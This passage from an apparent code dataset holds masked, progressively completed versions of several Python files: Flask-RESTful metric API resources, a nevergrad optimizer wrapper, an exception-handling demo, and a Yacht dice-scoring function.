to this endpoint) are processed.
Implemented Query Parameters:
- algorithm: to filter results by a given algorithm.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, POST
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = MlModelMetricSchema()
schema_collection = MlModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
def build_query(self):
"""
Override method to include query parameters specific to this ml_model
endpoint.
"""
query = super().build_query()
query = query.filter(Metric.metric_id == MlModelMetric.metric_id)
algorithm = request.args.get('algorithm')
if algorithm is not None:
query = query.filter(MlModelMetric.algorithm == algorithm)
return query
class MetricResource(BaseResource):
"""
This resource handles the HTTP requests coming to the endpoint "/metrics/{metric_id}".
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def get(self, metric_id):
"""
Implements the GET method for endpoint "/metrics/{metric_id}". It should be used
to get a single metric from the database.
:param metric_id: the metric_id associated with this endpoint
:return: the json object of metric found in the database (if it exists)
"""
metric = get_metric_by_id(metric_id)
return self.schema.jsonify(metric)
def put(self, metric_id):
"""
Implements the PUT method for endpoint "/metrics/{metric_id}". It should be used
to update a metric.
:param metric_id: the metric_id associated with this endpoint
:return: the metric as a json after the update (in case of success)
"""
json_data = request.get_json(force=True)
if not json_data:
abort(400, message='No input data provided')
metric = get_metric_by_id(metric_id)
self.load(json_data, metric, db.session, partial=True)
try:
db.session.commit()
except SQLAlchemyError as e:
abort(400, message=f'Database error. Reason: {e}')
return success(json_data)
def delete(self, metric_id):
"""
Implements the DELETE method for endpoint "/metrics/{metric_id}". It should be
used to delete the metric matching the provided metric_id.
:param metric_id: the metric_id associated with this endpoint
:return: the metric as a json after the delete (in case of success)
"""
metric = get_metric_by_id(metric_id)
result = self.schema.dump(metric)
try:
db.session.delete(metric)
db.session.commit()
except SQLAlchemyError as e:
abort(400, message=f'Database error. Reason: {e}')
return success(result)
class QuantModelMetricResource(MetricResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/quant_model/metrics/{metric_id}".
This subclass uses everything from the base class and only needs to specify the
appropriate schemas in the constructor.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = QuantModelMetricSchema()
schema_collection = QuantModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
class MlModelMetricResource(MetricResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/ml_model/metrics/{metric_id}".
This subclass uses everything from the base class and only needs to specify the
appropriate schemas in the constructor.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = MlModelMetricSchema()
schema_collection = MlModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
| from flask import request
from flask_restful import abort
from sqlalchemy.exc import SQLAlchemyError
from gm.main.models.model import db, Metric, QuantModelMetricSchema, \
MlModelMetricSchema, Frequency, QuantModelMetric, MlModelMetric, \
ThresholdType
from gm.main.resources import success, get_metric_by_id, BaseResource
class MetricsResource(BaseResource):
"""
This resource handles the HTTP requests coming to the endpoint "/metrics".
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, POST
"""
def get(self):
"""
Implements the GET method for endpoint "/metrics". By default the results are
ordered by 'metric_id' ascending.
Implemented Query Parameters:
- is_active: to filter results that are either active or inactive. Boolean and
case insensitive.
- frequency: filter results based on a metric frequency. Values of this enum must
be respected. Case insensitive.
- threshold_type: filter results based on a metric threshold type. Values of this
enum must be respected. Case insensitive.
- sort: allows one to order the resulting collection by 'metric_id' in descending
order. This should be done by specifying the query parameter as "sort=-metric_id".
Case insensitive.
Note: if unknown query parameters are given these will be ignored.
:return: a collection of metrics
"""
query = self.build_query()
metrics = query.all()
result = self.schema_collection.dump(metrics)
return success(result)
def build_query(self):
"""
Builds the query (without executing it) to be used in the GET method.
:return: query with all the query conditions specified for obtaining the metrics
that are in the database and respect the desired filters (query parameters).
"""
# this filter is required
query = Metric.query.filter(Metric.metric_type == self.metric_type)
# get query parameters (parameters which are not here are ignored)
is_active = request.args.get('is_active')
frequency = request.args.get('frequency')
threshold_type = request.args.get('threshold_type')
sort = request.args.get('sort')
# process each parameter, and if valid add it as a query condition
if is_active is not None:
is_active = is_active.lower() == 'true'
query = query.filter_by(is_active=is_active)
if frequency is not None:
try:
frequency = Frequency.from_name(frequency)
except ValueError as e:
msg = f"Invalid 'frequency': {frequency}. Use one of {Frequency.values()}"
abort(400, message=msg)
query = query.filter_by(frequency=frequency)
if threshold_type is not None:
try:
threshold_type = ThresholdType.from_name(threshold_type)
except ValueError as e:
msg = f"Invalid 'threshold_type': {threshold_type}. Use one of " \
f"{ThresholdType.values()}"
abort(400, message=msg)
query = query.filter_by(threshold_type=threshold_type)
if sort is not None and sort.lstrip("-") == 'metric_id':
query = query.order_by(Metric.metric_id.desc())
else:
query = query.order_by(Metric.metric_id)
return query
def post(self):
"""
Implements the POST method for endpoint "/metrics". It should be used to create a
new metric.
:return: the created metric as a json (in case of success)
"""
json_data = request.get_json(force=True)
if not json_data:
abort(400, message='No input data provided')
# make sure the metric_id (temporary) and metric_type (model) are filled
json_data["metric_id"] = "TBD"
json_data["metric_type"] = "model"
# validate and deserialize input
new_metric = self.load(json_data, session=db.session)
# get the next metric id and update metric object
try:
db.session.add(new_metric)
db.session.commit()
except SQLAlchemyError as e:
abort(400, message=f'Database error. Reason: {e}')
# dump to json and return result
result = self.schema.dump(new_metric)
return success(result, code=201)
class QuantModelMetricsResource(MetricsResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/quant_model/metrics/{metric_id}".
This subclass uses almost everything from the base class, it only needs to specify the
appropriate schemas in the constructor, and to override the build_query method so that
the appropriate metric_type is filtered and the remaining query parameters (specific
to this endpoint) are processed.
Implemented Query Parameters:
- asset_class: to filter results by a given asset class.
- model_name: to filter results by a given model name.
- pricing_library: to filter results for a given pricing library.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, POST
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = QuantModelMetricSchema()
schema_collection = QuantModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
def build_query(self):
"""
Override method to include query parameters specific to this model endpoint.
"""
# build query from base class add required field for joining with parent
query = super().build_query()
query = query.filter(Metric.metric_id == QuantModelMetric.metric_id)
# get the remaining query parameters
asset_class = request.args.get('asset_class')
model_name = request.args.get('model_name')
pricing_library = request.args.get('pricing_library')
# process each parameter and, if valid, add as a query condition
if asset_class is not None:
query = query.filter(QuantModelMetric.asset_class == asset_class)
if model_name is not None:
query = query.filter(QuantModelMetric.model_name == model_name)
if pricing_library is not None:
query = query.filter(QuantModelMetric.pricing_library == pricing_library)
return query
class MlModelMetricsResource(MetricsResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/ml_model/metrics/{metric_id}".
This subclass uses almost everything from the base class, it only needs to specify the
appropriate schemas in the constructor, and to override the build_query method so that
the appropriate metric_type is filtered and the remaining query parameters (specific
to this endpoint) are processed.
Implemented Query Parameters:
- algorithm: to filter results by a given algorithm.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, POST
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = MlModelMetricSchema()
schema_collection = MlModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
def build_query(self):
"""
Override method to include query parameters specific to this ml_model
endpoint.
"""
query = super().build_query()
query = query.filter(Metric.metric_id == MlModelMetric.metric_id)
algorithm = request.args.get('algorithm')
if algorithm is not None:
query = query.filter(MlModelMetric.algorithm == algorithm)
return query
class MetricResource(BaseResource):
"""
This resource handles the HTTP requests coming to the endpoint "/metrics/{metric_id}".
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def get(self, metric_id):
"""
Implements the GET method for endpoint "/metrics/{metric_id}". It should be used
to get a single metric from the database.
:param metric_id: the metric_id associated with this endpoint
:return: the json object of metric found in the database (if it exists)
"""
metric = get_metric_by_id(metric_id)
return self.schema.jsonify(metric)
def put(self, metric_id):
"""
Implements the PUT method for endpoint "/metrics/{metric_id}". It should be used
to update a metric.
:param metric_id: the metric_id associated with this endpoint
:return: the metric as a json after the update (in case of success)
"""
json_data = request.get_json(force=True)
if not json_data:
abort(400, message='No input data provided')
# Validate and deserialize input
metric = get_metric_by_id(metric_id)
self.load(json_data, metric, db.session, partial=True)
# if it was found and deserialized successfully try to commit
try:
db.session.commit()
except SQLAlchemyError as e:
abort(400, message=f'Database error. Reason: {e}')
return success(json_data)
def delete(self, metric_id):
"""
Implements the DELETE method for endpoint "/metrics/{metric_id}". It should be
used to delete the metric matching the provided metric_id.
:param metric_id: the metric_id associated with this endpoint
:return: the metric as a json after the delete (in case of success)
"""
metric = get_metric_by_id(metric_id)
# dump as json to send in the end if del is successful
result = self.schema.dump(metric)
# if result was found, delete it from database
try:
db.session.delete(metric)
db.session.commit()
except SQLAlchemyError as e:
abort(400, message=f'Database error. Reason: {e}')
return success(result)
class QuantModelMetricResource(MetricResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/quant_model/metrics/{metric_id}".
This subclass uses everything from the base class and only needs to specify the
appropriate schemas in the constructor.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = QuantModelMetricSchema()
schema_collection = QuantModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs)
class MlModelMetricResource(MetricResource):
"""
This resource handles the HTTP requests coming to the endpoint
"/ml_model/metrics/{metric_id}".
This subclass uses everything from the base class and only needs to specify the
appropriate schemas in the constructor.
Note: no trailing slash ("/") should be used.
Accepted HTTP methods: GET, PUT, DELETE
"""
def __init__(self, **kwargs):
"""
Initialize schemas with appropriate classes.
:param kwargs: pass through to base constructor (service and metric_type)
"""
schema = MlModelMetricSchema()
schema_collection = MlModelMetricSchema(many=True)
super().__init__(schema, schema_collection, **kwargs) | [
16,
19,
23,
25,
26
] |
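Note on record 622: the resource classes above only define request handlers. A minimal sketch of how they might be registered with Flask-RESTful, matching the endpoints named in the docstrings; the app setup and the metric_type kwarg are assumptions for illustration, not part of the record:

from flask import Flask
from flask_restful import Api

app = Flask(__name__)
api = Api(app)
# resource_class_kwargs is forwarded to each resource's __init__
api.add_resource(QuantModelMetricsResource, '/quant_model/metrics',
                 resource_class_kwargs={'metric_type': 'quant_model'})
api.add_resource(QuantModelMetricResource, '/quant_model/metrics/<metric_id>',
                 resource_class_kwargs={'metric_type': 'quant_model'})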
623 | 4a136a6284add3bcbd7f9546e18e79151cea685f | <mask token>
class _BaseNevergradOptimizer:
<mask token>
def __init__(self, method):
self.method = method
self.valid_methods = [x[0] for x in ng.optimizers.registry.items()]
self.sequential_methods = ['SQPCMA', 'chainCMAPowell', 'Powell']
self.is_sequential = self.method in self.sequential_methods
if self.is_sequential:
seq_msg = '{} is a sequential method. batch size is set to 1'
cprint(seq_msg.format(self.method), 'y')
assert self.method in self.valid_methods, f'unknown nevergrad method: {self.method}'
self.ng_optimizers = {}
self._sampled = {}
return
@torch.no_grad()
def setup_ng(self, var_manager, budget):
"""
initializes NeverGrad optimizer.
Args
var_manager (VariableManager): instance of the variable manager
budget (int): number of optimization iterations.
"""
for var_name, var_dict in var_manager.variable_info.items():
if var_dict['grad_free'] is False:
continue
if type(var_dict['grad_free']) == tuple:
mu, sigma = var_dict['grad_free']
if mu is None:
mu = np.zeros(var_dict['shape'])
if sigma is None:
sigma = 1.0
# mu seeds the nevergrad parametrization built below (sigma is currently unused)
else:
mu = np.zeros(var_dict['shape'])
sigma = 1.0
opt_fn = ng.optimizers.registry[self.method]
p = ng.p.Array(init=mu)
ng_opt = opt_fn(parametrization=p, budget=budget)
self.ng_optimizers[var_dict['var_type'], var_name] = ng_opt
assert len(self.ng_optimizers.keys()
) == 1, 'currently only a single input variable can be optimized via ' + 'Nevergrad but got: {}'.format(
self.ng_optimizers.keys())
return
<mask token>
<mask token>
| <mask token>
class _BaseNevergradOptimizer:
<mask token>
def __init__(self, method):
self.method = method
self.valid_methods = [x[0] for x in ng.optimizers.registry.items()]
self.sequential_methods = ['SQPCMA', 'chainCMAPowell', 'Powell']
self.is_sequential = self.method in self.sequential_methods
if self.is_sequential:
seq_msg = '{} is a sequential method. batch size is set to 1'
cprint(seq_msg.format(self.method), 'y')
assert self.method in self.valid_methods, f'unknown nevergrad method: {self.method}'
self.ng_optimizers = {}
self._sampled = {}
return
@torch.no_grad()
def setup_ng(self, var_manager, budget):
"""
initializes NeverGrad optimizer.
Args
var_manager (VariableManager): instance of the variable manager
budget (int): number of optimization iterations.
"""
for var_name, var_dict in var_manager.variable_info.items():
if var_dict['grad_free'] is False:
continue
if type(var_dict['grad_free']) == tuple:
mu, sigma = var_dict['grad_free']
if mu is None:
mu = np.zeros(var_dict['shape'])
if sigma is None:
sigma = 1.0
# mu seeds the nevergrad parametrization built below (sigma is currently unused)
else:
mu = np.zeros(var_dict['shape'])
sigma = 1.0
opt_fn = ng.optimizers.registry[self.method]
p = ng.p.Array(init=mu)
ng_opt = opt_fn(parametrization=p, budget=budget)
self.ng_optimizers[var_dict['var_type'], var_name] = ng_opt
assert len(self.ng_optimizers.keys()
) == 1, 'currently only a single input variable can be optimized via ' + 'Nevergrad but got: {}'.format(
self.ng_optimizers.keys())
return
<mask token>
@torch.no_grad()
def ng_update(self, variables, loss=None, inverted_loss=False):
"""
Updates NG distribution either with the provided loss or loss that
is recomputed.
Args:
variables (dict): a dictionary instance generated from the
variable manager.
loss (array or list): a 1-dimensional array or list consisting of
losses corresponding to each sample. If the loss is not
provided, uses the variables to recompute the loss.
[Default: None]
inverted_loss (bool): if True, the loss is computed after inverting
the generated images back to the original target. For example
this is used to compute the loss on the original target.
[Default: False]
"""
for (var_type, var_name), ng_opt in self.ng_optimizers.items():
ng_data = self._sampled[var_type, var_name]
if loss is None:
out, loss, _ = self.step(variables, optimize=False)
if inverted_loss and hasattr(variables, 'transform'):
target_type = self.var_manager.variable_info['target'][
'var_type']
weight_type = self.var_manager.variable_info['weight'][
'var_type']
target = self.var_manager.variable_info['target']['default']
weight = self.var_manager.variable_info['weight']['default']
target = target.unsqueeze(0).type_as(out)
weight = weight.unsqueeze(0).type_as(out)
t_fn = self.transform_fns['target']['fn']
t_param = torch.stack(variables.transform.t.data)
out = t_fn(out, t_param, invert=True)
loss = self.loss_fn(out, target, binarize(weight))
loss = loss.cpu().detach().numpy()
for d, l in zip(ng_data, loss):
ng_opt.tell(d, l)
return
| <mask token>
class _BaseNevergradOptimizer:
<mask token>
def __init__(self, method):
self.method = method
self.valid_methods = [x[0] for x in ng.optimizers.registry.items()]
self.sequential_methods = ['SQPCMA', 'chainCMAPowell', 'Powell']
self.is_sequential = self.method in self.sequential_methods
if self.is_sequential:
seq_msg = '{} is a sequential method. batch size is set to 1'
cprint(seq_msg.format(self.method), 'y')
assert self.method in self.valid_methods, f'unknown nevergrad method: {self.method}'
self.ng_optimizers = {}
self._sampled = {}
return
@torch.no_grad()
def setup_ng(self, var_manager, budget):
"""
initializes NeverGrad optimizer.
Args
var_manager (VariableManager): instance of the variable manager
budget (int): number of optimization iterations.
"""
for var_name, var_dict in var_manager.variable_info.items():
if var_dict['grad_free'] is False:
continue
if type(var_dict['grad_free']) == tuple:
mu, sigma = var_dict['grad_free']
if mu is None:
mu = np.zeros(var_dict['shape'])
if sigma is None:
sigma = 1.0
# mu seeds the nevergrad parametrization built below (sigma is currently unused)
else:
mu = np.zeros(var_dict['shape'])
sigma = 1.0
opt_fn = ng.optimizers.registry[self.method]
p = ng.p.Array(init=mu)
ng_opt = opt_fn(parametrization=p, budget=budget)
self.ng_optimizers[var_dict['var_type'], var_name] = ng_opt
assert len(self.ng_optimizers.keys()
) == 1, 'currently only a single input variable can be optimized via ' + 'Nevergrad but got: {}'.format(
self.ng_optimizers.keys())
return
@torch.no_grad()
def ng_init(self, var_manager, num_samples):
"""
Args
var_manager (VariableManager): instance of the variable manager
num_samples (int): number of samples for mini-batch optimization
"""
if self.is_sequential:
vars = var_manager.initialize(num_seeds=1)
num_samples = 1
else:
vars = var_manager.initialize(num_samples=num_samples)
for (var_type, var_name), ng_opt in self.ng_optimizers.items():
ng_data = [ng_opt.ask() for _ in range(num_samples)]
_ng_data = np.concatenate([x.args for x in ng_data])
for i, d in enumerate(_ng_data):
vars[var_type][var_name].data[i].data = torch.Tensor(d
).data.type_as(vars[var_type][var_name].data[i].data)
self._sampled[var_type, var_name] = ng_data
return vars
@torch.no_grad()
def ng_update(self, variables, loss=None, inverted_loss=False):
"""
Updates NG distribution either with the provided loss or loss that
is recomputed.
Args:
variables (dict): a dictionary instance generated from the
variable manager.
loss (array or list): a 1-dimensional array or list consisting of
losses corresponding to each sample. If the loss is not
provided, uses the variables to recompute the loss.
[Default: None]
inverted_loss (bool): if True, the loss is computed after inverting
the generated images back to the original target. For example
this is used to compute the loss on the original target.
[Default: False]
"""
for (var_type, var_name), ng_opt in self.ng_optimizers.items():
ng_data = self._sampled[var_type, var_name]
if loss is None:
out, loss, _ = self.step(variables, optimize=False)
if inverted_loss and hasattr(variables, 'transform'):
target_type = self.var_manager.variable_info['target'][
'var_type']
weight_type = self.var_manager.variable_info['weight'][
'var_type']
target = self.var_manager.variable_info['target']['default']
weight = self.var_manager.variable_info['weight']['default']
target = target.unsqueeze(0).type_as(out)
weight = weight.unsqueeze(0).type_as(out)
t_fn = self.transform_fns['target']['fn']
t_param = torch.stack(variables.transform.t.data)
out = t_fn(out, t_param, invert=True)
loss = self.loss_fn(out, target, binarize(weight))
loss = loss.cpu().detach().numpy()
for d, l in zip(ng_data, loss):
ng_opt.tell(d, l)
return
| <mask token>
class _BaseNevergradOptimizer:
"""
Base template for NeverGrad optimization. Should be used jointly with
BaseOptimizer.
For full list of available optimizers
> https://github.com/facebookresearch/nevergrad
or ...
> print(self.valid_methods)
Args:
method: nevergrad optimization method
NOTE:
nevergrad CMA has been observed to perform worse than the original
codebase; use with caution. nevergrad has the perk of being optimized
in parallel, hence the batch size can be chosen arbitrarily.
"""
def __init__(self, method):
self.method = method
self.valid_methods = [x[0] for x in ng.optimizers.registry.items()]
self.sequential_methods = ['SQPCMA', 'chainCMAPowell', 'Powell']
self.is_sequential = self.method in self.sequential_methods
if self.is_sequential:
seq_msg = '{} is a sequential method. batch size is set to 1'
cprint(seq_msg.format(self.method), 'y')
assert self.method in self.valid_methods, f'unknown nevergrad method: {self.method}'
self.ng_optimizers = {}
self._sampled = {}
return
@torch.no_grad()
def setup_ng(self, var_manager, budget):
"""
initializes NeverGrad optimizer.
Args
var_manager (VariableManager): instance of the variable manager
budget (int): number of optimization iterations.
"""
for var_name, var_dict in var_manager.variable_info.items():
if var_dict['grad_free'] is False:
continue
if type(var_dict['grad_free']) == tuple:
mu, sigma = var_dict['grad_free']
if mu is None:
mu = np.zeros(var_dict['shape'])
if sigma is None:
sigma = 1.0
# mu seeds the nevergrad parametrization built below (sigma is currently unused)
else:
mu = np.zeros(var_dict['shape'])
sigma = 1.0
opt_fn = ng.optimizers.registry[self.method]
p = ng.p.Array(init=mu)
ng_opt = opt_fn(parametrization=p, budget=budget)
self.ng_optimizers[var_dict['var_type'], var_name] = ng_opt
assert len(self.ng_optimizers.keys()
) == 1, 'currently only a single input variable can be optimized via ' + 'Nevergrad but got: {}'.format(
self.ng_optimizers.keys())
return
@torch.no_grad()
def ng_init(self, var_manager, num_samples):
"""
Args
var_manager (VariableManager): instance of the variable manager
num_samples (int): number of samples for mini-batch optimization
"""
if self.is_sequential:
vars = var_manager.initialize(num_seeds=1)
num_samples = 1
else:
vars = var_manager.initialize(num_samples=num_samples)
for (var_type, var_name), ng_opt in self.ng_optimizers.items():
ng_data = [ng_opt.ask() for _ in range(num_samples)]
_ng_data = np.concatenate([x.args for x in ng_data])
for i, d in enumerate(_ng_data):
vars[var_type][var_name].data[i].data = torch.Tensor(d
).data.type_as(vars[var_type][var_name].data[i].data)
self._sampled[var_type, var_name] = ng_data
return vars
@torch.no_grad()
def ng_update(self, variables, loss=None, inverted_loss=False):
"""
Updates NG distribution either with the provided loss or loss that
is recomputed.
Args:
variables (dict): a dictionary instance generated from the
variable manager.
loss (array or list): a 1-dimensional array or list consisting of
losses corresponding to each sample. If the loss is not
provided, uses the variables to recompute the loss.
[Default: None]
inverted_loss (bool): if True, the loss is computed after inverting
the generated images back to the original target. For example
this is used to compute the loss on the original target.
[Default: False]
"""
for (var_type, var_name), ng_opt in self.ng_optimizers.items():
ng_data = self._sampled[var_type, var_name]
if loss is None:
out, loss, _ = self.step(variables, optimize=False)
if inverted_loss and hasattr(variables, 'transform'):
target_type = self.var_manager.variable_info['target'][
'var_type']
weight_type = self.var_manager.variable_info['weight'][
'var_type']
target = self.var_manager.variable_info['target']['default']
weight = self.var_manager.variable_info['weight']['default']
target = target.unsqueeze(0).type_as(out)
weight = weight.unsqueeze(0).type_as(out)
t_fn = self.transform_fns['target']['fn']
t_param = torch.stack(variables.transform.t.data)
out = t_fn(out, t_param, invert=True)
loss = self.loss_fn(out, target, binarize(weight))
loss = loss.cpu().detach().numpy()
for d, l in zip(ng_data, loss):
ng_opt.tell(d, l)
return
| import nevergrad as ng
import numpy as np
import torch
from pix2latent.utils.image import binarize
class _BaseNevergradOptimizer():
"""
Base template for NeverGrad optimization. Should be used jointly with
BaseOptimizer.
For full list of available optimizers
> https://github.com/facebookresearch/nevergrad
or ...
> print(self.valid_methods)
Args:
method: nevergrad optimization method
NOTE:
nevergrad CMA has been observed to perform worse than the original
codebase; use with caution. nevergrad has the perk of being optimized
in parallel, hence the batch size can be chosen arbitrarily.
"""
def __init__(self, method):
self.method = method
self.valid_methods = [x[0] for x in ng.optimizers.registry.items()]
# this is not an exhaustive list
self.sequential_methods = ['SQPCMA', 'chainCMAPowell', 'Powell']
self.is_sequential = self.method in self.sequential_methods
if self.is_sequential:
seq_msg = '{} is a sequential method. batch size is set to 1'
cprint(seq_msg.format(self.method), 'y')
assert self.method in self.valid_methods, \
f'unknown nevergrad method: {self.method}'
self.ng_optimizers = {}
self._sampled = {}
return
@torch.no_grad()
def setup_ng(self, var_manager, budget):
"""
initializes NeverGrad optimizer.
Args
var_manager (VariableManager): instance of the variable manager
budget (int): number of optimization iterations.
"""
for var_name, var_dict in var_manager.variable_info.items():
if var_dict['grad_free'] is False:
continue
if type(var_dict['grad_free']) == tuple:
mu, sigma = var_dict['grad_free']
if mu is None:
mu = np.zeros(var_dict['shape'])
if sigma is None:
sigma = 1.
# mu seeds the nevergrad parametrization built below (sigma is currently unused)
else:
mu = np.zeros(var_dict['shape'])
sigma = 1.0
opt_fn = ng.optimizers.registry[self.method]
p = ng.p.Array(init=mu)#.set_mutation(sigma=sigma)
ng_opt = opt_fn(parametrization=p, budget=budget)
self.ng_optimizers[(var_dict['var_type'], var_name)] = ng_opt
assert len(self.ng_optimizers.keys()) == 1, \
'currently only a single input variable can be optimized via '+\
'Nevergrad but got: {}'.format(self.ng_optimizers.keys())
return
@torch.no_grad()
def ng_init(self, var_manager, num_samples):
"""
Args
var_manager (VariableManager): instance of the variable manager
num_samples (int): number of samples for mini-batch optimization
"""
if self.is_sequential:
vars = var_manager.initialize(num_seeds=1)
num_samples = 1
else:
vars = var_manager.initialize(num_samples=num_samples)
for (var_type, var_name), ng_opt in self.ng_optimizers.items():
ng_data = [ng_opt.ask() for _ in range(num_samples)]
_ng_data = np.concatenate([x.args for x in ng_data])
for i, d in enumerate(_ng_data):
vars[var_type][var_name].data[i].data = \
torch.Tensor(d).data.type_as(
vars[var_type][var_name].data[i].data)
self._sampled[(var_type, var_name)] = ng_data
return vars
@torch.no_grad()
def ng_update(self, variables, loss=None, inverted_loss=False):
"""
Updates NG distribution either with the provided loss or loss that
is recomputed.
Args:
variables (dict): a dictionary instance generated from the
variable manager.
loss (array or list): a 1-dimensional array or list consisting of
losses corresponding to each sample. If the loss is not
provided, uses the variables to recompute the loss.
[Default: None]
inverted_loss (bool): if True, the loss is computed after inverting
the generated images back to the original target. For example
this is used to compute the loss on the original target.
[Default: False]
"""
for (var_type, var_name), ng_opt in self.ng_optimizers.items():
ng_data = self._sampled[(var_type, var_name)]
if loss is None:
out, loss, _ = self.step(variables, optimize=False)
if inverted_loss and hasattr(variables, 'transform'):
target_type = \
self.var_manager.variable_info['target']['var_type']
weight_type = \
self.var_manager.variable_info['weight']['var_type']
target = self.var_manager.variable_info['target']['default']
weight = self.var_manager.variable_info['weight']['default']
target = target.unsqueeze(0).type_as(out)
weight = weight.unsqueeze(0).type_as(out)
t_fn = self.transform_fns['target']['fn']
t_param = torch.stack(variables.transform.t.data)
out = t_fn(out, t_param, invert=True)
loss = self.loss_fn(out, target, binarize(weight))
loss = loss.cpu().detach().numpy()
for d, l in zip(ng_data, loss):
ng_opt.tell(d, l)
return
| [
3,
4,
5,
6,
8
] |
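Note on record 623: the class wraps nevergrad's ask/tell interface. Stripped of the pix2latent plumbing, the underlying loop is roughly the sketch below; the optimizer name and the toy loss are arbitrary illustrative choices, not part of the record.

import nevergrad as ng
import numpy as np

target = np.array([1.0, -2.0, 0.5])
def loss_fn(x):
    # toy loss: squared distance from an arbitrary target vector
    return float(np.sum((x - target) ** 2))

opt_fn = ng.optimizers.registry['OnePlusOne']  # same registry lookup as setup_ng
opt = opt_fn(parametrization=ng.p.Array(init=np.zeros(3)), budget=200)
for _ in range(200):
    cand = opt.ask()                       # sampling step, as in ng_init
    opt.tell(cand, loss_fn(cand.args[0]))  # update step, as in ng_update
print(opt.provide_recommendation().args[0])  # best point found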
624 | 1bf79319613ca1454f3a9ed21068bd899616395c | <mask token>
| <mask token>
try:
print(int(s) + 1)
print(int(s) / 1)
except ValueError as ve:
print('ValueError occurs!!!', ve)
except ZeroDivisionError as e:
print('ValueError occurs!!!', e)
except:
print('Error occurs!!!')
else:
print('elseeeeeeeeeeeeeee')
finally:
print('ABCDEFG')
| s = '123'
try:
print(int(s) + 1)
print(int(s) / 1)
except ValueError as ve:
print('ValueError occurs!!!', ve)
except ZeroDivisionError as e:
print('ValueError occurs!!!', e)
except:
print('Error occurs!!!')
else:
print('elseeeeeeeeeeeeeee')
finally:
print('ABCDEFG')
| #-*- coding: utf-8 -*-
s = "123"
try:
print(int(s) + 1)
print(int(s) / 1)
except ValueError as ve:
print("ValueError occurs!!!", ve)
except ZeroDivisionError as e:
print("ValueError occurs!!!", e)
except :
print("Error occurs!!!")
else:
print("elseeeeeeeeeeeeeee")
finally:
print("ABCDEFG")
# try:
# # code that may raise an exception
# except:
# # statements that handle the exception
# except:
# pass  # swallow the exception?!
# else:
# # runs only when no exception occurred
# finally:
# # runs whether or not an exception occurred | null | [
0,
1,
2,
3
] |
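Note on record 624: the snippet demonstrates try/except/else/finally ordering. A small standalone sketch of the two execution paths (else runs only on success; finally runs on both paths, even past a return):

def parse(s):
    try:
        n = int(s)  # may raise ValueError
    except ValueError as e:
        print('handler ran:', e)
        return None
    else:
        print('else ran: no exception')
        return n
    finally:
        print('finally ran: always')

parse('123')  # prints: else ran, finally ran
parse('abc')  # prints: handler ran, finally ran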
625 | 40bc8122d98d407341a56251f9abfab019e0acd8 | <mask token>
| <mask token>
class Category(Enum):
ONES = 1
TWOS = 2
THREES = 3
FOURS = 4
FIVES = 5
SIXES = 6
YACHT = auto()
FULL_HOUSE = auto()
FOUR_OF_A_KIND = auto()
LITTLE_STRAIGHT = auto()
BIG_STRAIGHT = auto()
CHOICE = auto()
<mask token>
| <mask token>
class Category(Enum):
ONES = 1
TWOS = 2
THREES = 3
FOURS = 4
FIVES = 5
SIXES = 6
YACHT = auto()
FULL_HOUSE = auto()
FOUR_OF_A_KIND = auto()
LITTLE_STRAIGHT = auto()
BIG_STRAIGHT = auto()
CHOICE = auto()
def score(dice, category):
die_counts = Counter(dice)
if category.value in range(1, 7):
return sum(d for d in dice if d == category.value)
if category is Category.YACHT:
return 50 if len(die_counts) == 1 else 0
if category is Category.CHOICE:
return sum(dice)
if category is Category.BIG_STRAIGHT:
return 30 if 1 not in die_counts and len(die_counts) == 5 else 0
if category is Category.LITTLE_STRAIGHT:
return 30 if 6 not in die_counts and len(die_counts) == 5 else 0
if category is Category.FULL_HOUSE:
return sum(dice) if len(die_counts) == 2 and 3 in die_counts.values(
) else 0
if category is Category.FOUR_OF_A_KIND:
four_die = [d for d, c in die_counts.items() if c >= 4]
return four_die[0] * 4 if four_die else 0
| from collections import Counter
from enum import auto, Enum
class Category(Enum):
ONES = 1
TWOS = 2
THREES = 3
FOURS = 4
FIVES = 5
SIXES = 6
YACHT = auto()
FULL_HOUSE = auto()
FOUR_OF_A_KIND = auto()
LITTLE_STRAIGHT = auto()
BIG_STRAIGHT = auto()
CHOICE = auto()
def score(dice, category):
die_counts = Counter(dice)
if category.value in range(1, 7):
return sum(d for d in dice if d == category.value)
if category is Category.YACHT:
return 50 if len(die_counts) == 1 else 0
if category is Category.CHOICE:
return sum(dice)
if category is Category.BIG_STRAIGHT:
return 30 if 1 not in die_counts and len(die_counts) == 5 else 0
if category is Category.LITTLE_STRAIGHT:
return 30 if 6 not in die_counts and len(die_counts) == 5 else 0
if category is Category.FULL_HOUSE:
return sum(dice) if len(die_counts) == 2 and 3 in die_counts.values(
) else 0
